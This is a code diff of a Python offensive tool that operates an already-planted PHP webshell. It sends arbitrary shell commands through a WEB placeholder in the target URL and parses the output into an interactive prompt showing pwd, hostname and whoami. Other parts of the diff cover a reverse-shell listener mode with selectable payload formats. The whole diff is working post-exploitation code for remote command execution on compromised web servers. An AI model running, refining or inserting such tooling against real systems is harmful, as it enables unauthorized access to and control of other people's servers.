@@ -92,7 +92,7 @@ def banner():
 #=================================================================================================================================================	
 # This function checks the avalibility of the target, if the target is reachable or not. and it also checks if the .php file is there or not
 #=================================================================================================================================================	
-def avalability_check(target , type): 
+def avalability_check(target , type):
 	ainfo("Checking avalability of the Address")
 	splitted_target = list(map(str , target.split('/'))) # Splitts the .php file from the url example. 'cmd.php' from http://127.0.0.1/cmd.php
 	splitted_php_param = list(map(str, splitted_target[-1].split("?")))
@@ -247,39 +247,72 @@ def pwd_filter(pwd):
     else:
         return pwd
 
+
+#=================================================================================================================================================	
+# This function checks for webshell commands
+#=================================================================================================================================================	
+
+def webshell_help(cmd=None):
+	if cmd == "help":
+		cmds = ['clear' , 'exit' , 'help' ]
+		for each in cmds:
+			print(f"\t{cmds.index(each) + 1}. {each}")
+		return True
+	else:
+		if cmd == "exit":
+			ainfo("Exitting...")
+			sys.exit()
+		if cmd == "clear":
+			print("\x1b[2J\x1b[H",end="")
+			return True
+		else:
+			return False
+
+
+
 #=================================================================================================================================================
 #	This function sends every command to the webshell
 #=================================================================================================================================================	
 
 def webshell(target):
 	try:
+		ainfo("Use 'help' to see cshell-web commands")
 		ap("Spawning prompt..")
-		time.sleep(1)
+		time.sleep(2)
 		pwd = pwd_filter(requests.get(f"{target.replace('WEB' , 'pwd')}").text.rstrip())
 		whoami = requests.get(f"{target.replace('WEB' , 'whoami')}").text.rstrip()		# |Getting necessary info for the 1st time prompt
 		hostname = requests.get(f"{target.replace('WEB' , 'hostname')}").text.rstrip()
 		
 		print("\x1b[2J\x1b[H",end="") #This clears the screen
 		while 1:
-			inpt = input(prompt(pwd , hostname , whoami))
-			cmd = requests.utils.quote(f"echo -n [OUTPUT_START] && cd {pwd}&&{inpt} 2>&1 &&echo [PROMPT_START]$(pwd)[+]$(hostname)[+]$(whoami)[PROMPT_END][OUTPUT_END]") # sending 2>&1 with the prompt in order to get the error message 
-			res = requests.get(f"{target.replace('WEB' , cmd)}") # Replacing the web parameter with the cmd
-			# Filtering the response and sorting necessary responses
-			if "[OUTPUT_START]" in res.text and '[OUTPUT_END]' in res.text:
-				response = res.text.split("[OUTPUT_START]")[1].split('[OUTPUT_END]')[0].split("[PROMPT_START]")
-				output = str("".join(response[:1])).rstrip()
-				print ((output))
-				prompt_arr = list(map(str , response[1].split("[+]")))
-				pwd = pwd_filter(prompt_arr[0].rstrip())
-				hostname = prompt_arr[-2].rstrip()
-				whoami = prompt_arr[-1].rstrip().replace("[PROMPT_END]" , "")
-				
-			# incase of error this prints out
-			else:
-				print(f"{red}{res.text.rstrip().replace('[OUTPUT_START]' , '')}")
-	except:
+			try:
+				inpt = input(prompt(pwd , hostname , whoami))
+				if webshell_help(inpt):
+					continue
+
+				cmd = requests.utils.quote(f"echo -n [OUTPUT_START] && cd {pwd}&&{inpt} 2>&1 &&echo [PROMPT_START]$(pwd)[+]$(hostname)[+]$(whoami)[PROMPT_END][OUTPUT_END]") # sending 2>&1 with the prompt in order to get the error message 
+				res = requests.get(f"{target.replace('WEB' , cmd)}") # Replacing the web parameter with the cmd
+				# Filtering the response and sorting necessary responses
+				if "[OUTPUT_START]" in res.text and '[OUTPUT_END]' in res.text:
+					response = res.text.split("[OUTPUT_START]")[1].split('[OUTPUT_END]')[0].split("[PROMPT_START]")
+					output = str("".join(response[:1])).rstrip()
+					print ((output))
+					prompt_arr = list(map(str , response[1].split("[+]")))
+					pwd = pwd_filter(prompt_arr[0].rstrip())
+					hostname = prompt_arr[-2].rstrip()
+					whoami = prompt_arr[-1].rstrip().replace("[PROMPT_END]" , "")
+					
+				# incase of error this prints out
+				else:
+					print(f"{red}{res.text.rstrip().replace('[OUTPUT_START]' , '')}")
+			except KeyboardInterrupt:
+				print()
+				continue
+	except EOFError:
 		print()
-		aerr("Exitting..")
+		aerr("Exitting...")
+		sys.exit()
+
 #=================================================================================================================================================
 #	This function extracts ip address from the interface names
 #=================================================================================================================================================
@@ -324,6 +357,9 @@ def listener(ifname , port , payload_type='bash' , startlistener=False , base64e
 #+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
 def main():
+	if os.name == "nt":
+		aerr("This script is for linux kernerls, Thank you.")
+		sys.exit()
 	# This are for the Arguments
 	myparser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter ,  epilog=textwrap.dedent('''\
 		web\tDirect command execution on the webshell with error message
@@ -371,6 +407,9 @@ def main():
 			ip = args.i
 			port = args.p
 			fmt = args.f
+			if "REV" not in url:
+				aerr(f"\'REV\' not found on Target URL")
+				sys.exit()
 			if fmt not in list(payloads_dict.keys()):
 				aerr("Format not found")
 				ainfo("Shifting to defaut format : bash")
@@ -386,6 +425,9 @@ def main():
 	elif args.command == "web":
 		banner()
 		url = args.u
+		if "WEB" not in url:
+			aerr(f"\'WEB\' not found on Target URL")
+			sys.exit()
 		info("web" , url)
 		if avalability_check(url , "WEB"):
 			webshell(url)
